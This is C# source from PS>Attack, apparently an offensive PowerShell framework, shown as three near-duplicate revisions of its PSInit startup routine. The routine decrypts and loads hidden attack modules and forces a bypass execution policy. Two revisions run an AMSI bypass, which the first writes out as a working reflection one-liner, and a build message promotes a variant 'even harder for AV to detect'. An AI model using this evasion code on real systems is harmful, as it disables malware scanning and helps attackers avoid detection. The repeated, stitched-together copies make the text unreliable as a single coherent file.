static AttackState PSInit() { // Display Loading Message Console.ForegroundColor = PSColors.logoText; Random random = new Random(); int pspLogoInt = random.Next(Strings.psaLogos.Count); Console.WriteLine(Strings.psaLogos[pspLogoInt]); Console.WriteLine("PS>Attack is loading..."); // create attackState AttackState attackState = new AttackState(); attackState.cursorPos = attackState.promptLength; // AMSI bypass care of @mattifestion (https://twitter.com/mattifestation/status/735261120487772160) if (Environment.OSVersion.Version.Major > 9) { try { attackState.cmd = "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"; Processing.PSExec(attackState); } catch { Console.WriteLine("Could not run AMSI bypass."); } } // Decrypt modules Assembly assembly = Assembly.GetExecutingAssembly(); string[] resources = assembly.GetManifestResourceNames(); foreach (string resource in resources) { if (resource.Contains(".enc")) { string fileName = resource.Replace("PSAttack.Modules.", "").Replace(".ps1.enc", ""); string decFilename = CryptoUtils.DecryptString(fileName); Console.ForegroundColor = PSColors.loadingText; Console.WriteLine("Decrypting: " + decFilename); Stream moduleStream = assembly.GetManifestResourceStream(resource); PSAUtils.ImportModules(attackState, moduleStream); } } // Setup PS env attackState.cmd = "set-executionpolicy bypass -Scope process -Force"; Processing.PSExec(attackState); // check for admin Boolean isAdmin = false; Boolean debugProc = false; if (new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) { isAdmin = true; try { System.Diagnostics.Process.EnterDebugMode(); debugProc = true; } catch { Console.Write("Could not grab debug rights for process."); } } // Setup Console Console.Title = Strings.windowTitle; Console.BufferHeight = Int16.MaxValue - 10; Console.BackgroundColor = PSColors.background; Console.TreatControlCAsInput = true; Console.Clear(); // get build info string buildString; string attackDate = new StreamReader(assembly.GetManifestResourceStream("PSAttack.Resources.attackDate.txt")).ReadToEnd(); Boolean builtWithBuildTool = true; if (attackDate.Length > 12) { buildString = "It was custom made by the PS>Attack Build Tool on " + attackDate + "\n"; } else { string buildDate = new StreamReader(assembly.GetManifestResourceStream("PSAttack.Resources.BuildDate.txt")).ReadToEnd(); buildString = "It was built on " + buildDate + "\nIf you'd like a version of PS>Attack thats even harder for AV \nto detect checkout http://github.com/jaredhaight/PSAttackBuildTool \n"; builtWithBuildTool = false; } // Figure out if we're 32 or 64bit string arch = "64bit"; if (IntPtr.Size == 4) { arch = "32bit"; } // setup debug variable String debugCmd = "$debug = @{'psaVersion'='" + Strings.version + "';'osVersion'='" + Environment.OSVersion.ToString() + "';'.NET'='" + System.Environment.Version + "';'isAdmin'='" + isAdmin + "';'builtWithBuildTool'='" + builtWithBuildTool.ToString() + "';'debugRights'='" + debugProc + "';'arch'='" + arch + "'}"; attackState.cmd = debugCmd; Processing.PSExec(attackState); // print intro Console.ForegroundColor = PSColors.introText; Console.WriteLine(Strings.welcomeMessage, Strings.version, buildString); // Display Prompt attackState.ClearLoop(); attackState.ClearIO(); Display.printPrompt(attackState); return(attackState); }
static AttackState PSInit() { // Display Loading Message Console.ForegroundColor = PSColors.logoText; Random random = new Random(); int pspLogoInt = random.Next(Strings.psaLogos.Count); Console.WriteLine(Strings.psaLogos[pspLogoInt]); Console.WriteLine("PS>Attack is loading..."); // create attackState AttackState attackState = new AttackState(); attackState.cursorPos = attackState.promptLength; // Get Encrypted Values Assembly assembly = Assembly.GetExecutingAssembly(); Stream valueStream = assembly.GetManifestResourceStream("PSAttack.Resources." + Properties.Settings.Default.valueStore); MemoryStream valueStore = CryptoUtils.DecryptFile(valueStream); string valueStoreStr = Encoding.Unicode.GetString(valueStore.ToArray()); string[] valuePairs = valueStoreStr.Replace("\r", "").Split('\n'); foreach (string value in valuePairs) { if (value != "") { string[] entry = value.Split('|'); attackState.decryptedStore.Add(entry[0], entry[1]); } } // amsi bypass (thanks matt!!) if (Environment.OSVersion.Version.Major > 9) { try { attackState.cmd = attackState.decryptedStore["amsiBypass"]; Processing.PSExec(attackState); } catch { Console.WriteLine("Could not run AMSI bypass."); } } // Decrypt modules string[] resources = assembly.GetManifestResourceNames(); foreach (string resource in resources) { if (resource.Contains("PSAttack.Modules.")) { string fileName = resource.Replace("PSAttack.Modules.", ""); string decFilename = CryptoUtils.DecryptString(fileName); Console.ForegroundColor = PSColors.loadingText; Console.WriteLine("Decrypting: {0}", decFilename); Stream moduleStream = assembly.GetManifestResourceStream(resource); PSAUtils.ImportModules(attackState, moduleStream); } } // Setup PS env attackState.cmd = attackState.decryptedStore["setExecutionPolicy"]; Processing.PSExec(attackState); // check for admin Boolean isAdmin = false; Boolean debugProc = false; if (new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) { isAdmin = true; try { System.Diagnostics.Process.EnterDebugMode(); debugProc = true; } catch { Console.Write("Could not grab debug rights for process."); } } // Setup Console Console.Title = Strings.windowTitle; Console.BufferHeight = Int16.MaxValue - 10; Console.BackgroundColor = PSColors.background; Console.TreatControlCAsInput = true; Console.Clear(); // get build info string buildString; string attackDate = new StreamReader(assembly.GetManifestResourceStream("PSAttack.Resources.attackDate.txt")).ReadToEnd(); Boolean builtWithBuildTool = true; if (attackDate.Length > 12) { buildString = "It was custom made by the PS>Attack Build Tool on " + attackDate + "\n"; } else { string buildDate = new StreamReader(assembly.GetManifestResourceStream("PSAttack.Resources.BuildDate.txt")).ReadToEnd(); buildString = "It was built on " + buildDate + "\nIf you'd like a version of PS>Attack thats even harder for AV \nto detect checkout http://github.com/jaredhaight/PSAttackBuildTool \n"; builtWithBuildTool = false; } // Figure out if we're 32 or 64bit string arch = "64bit"; if (IntPtr.Size == 4) { arch = "32bit"; } // setup debug variable String debugCmd = "$debug = @{'psaVersion'='" + Strings.version + "';'osVersion'='" + Environment.OSVersion.ToString() + "';'.NET'='" + System.Environment.Version + "';'isAdmin'='" + isAdmin + "';'builtWithBuildTool'='" + builtWithBuildTool.ToString() + "';'debugRights'='" + debugProc + "';'arch'='" + arch + "'}"; attackState.cmd = debugCmd; Processing.PSExec(attackState); // print intro Console.ForegroundColor = PSColors.introText; Console.WriteLine(Strings.welcomeMessage, Strings.version, buildString); // Display Prompt attackState.ClearLoop(); attackState.ClearIO(); Display.printPrompt(attackState); return(attackState); }
static AttackState PSInit() { // Display Loading Message Console.ForegroundColor = PSColors.logoText; Random random = new Random(); int pspLogoInt = random.Next(Strings.psaLogos.Count); Console.WriteLine(Strings.psaLogos[pspLogoInt]); Console.WriteLine("PS>Attack is loading..."); // create attackState AttackState attackState = new AttackState(); attackState.cursorPos = Display.createPrompt(attackState).Length; // Decrypt modules Assembly assembly = Assembly.GetExecutingAssembly(); string[] resources = assembly.GetManifestResourceNames(); foreach (string resource in resources) { if (resource.Contains(".enc")) { string fileName = resource.Replace("PSAttack.Modules.", "").Replace(".ps1.enc", ""); string decFilename = CryptoUtils.DecryptString(fileName); Console.ForegroundColor = PSColors.loadingText; Console.WriteLine("Decrypting: " + decFilename); Stream moduleStream = assembly.GetManifestResourceStream(resource); PSAUtils.ImportModules(attackState, moduleStream); } } // Setup PS env attackState.cmd = "set-executionpolicy bypass -Scope process -Force"; Processing.PSExec(attackState); // check for admin Boolean isAdmin = false; if (new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) { isAdmin = true; System.Diagnostics.Process.EnterDebugMode(); } // setup debug variable String debugCmd = "$debug = @{'.NET'='" + System.Environment.Version + "';'isAdmin'='" + isAdmin + "'}"; attackState.cmd = debugCmd; Processing.PSExec(attackState); // Setup Console Console.Title = Strings.windowTitle; Console.BufferHeight = Int16.MaxValue - 10; Console.BackgroundColor = PSColors.background; Console.Clear(); // Display alpha warning //Console.ForegroundColor = PSColors.errorText; //Console.WriteLine(Strings.warning); // display intro text Console.ForegroundColor = PSColors.introText; string buildString; string attackDate = new StreamReader(assembly.GetManifestResourceStream("PSAttack.Resources.attackDate.txt")).ReadToEnd(); if (attackDate.Length > 12) { buildString = "It was custom made by the PS>Attack Build Tool on " + attackDate + "\n"; } else { string buildDate = new StreamReader(assembly.GetManifestResourceStream("PSAttack.Resources.BuildDate.txt")).ReadToEnd(); buildString = "It was built on " + buildDate + "\nIf you'd like a version of PS>Attack thats even harder for AV \nto detect checkout http://github.com/jaredhaight/PSAttackBuildTool \n"; } Console.WriteLine(Strings.welcomeMessage, Strings.version, buildString); // Display Prompt attackState.ClearLoop(); attackState.ClearIO(); Display.printPrompt(attackState); return(attackState); }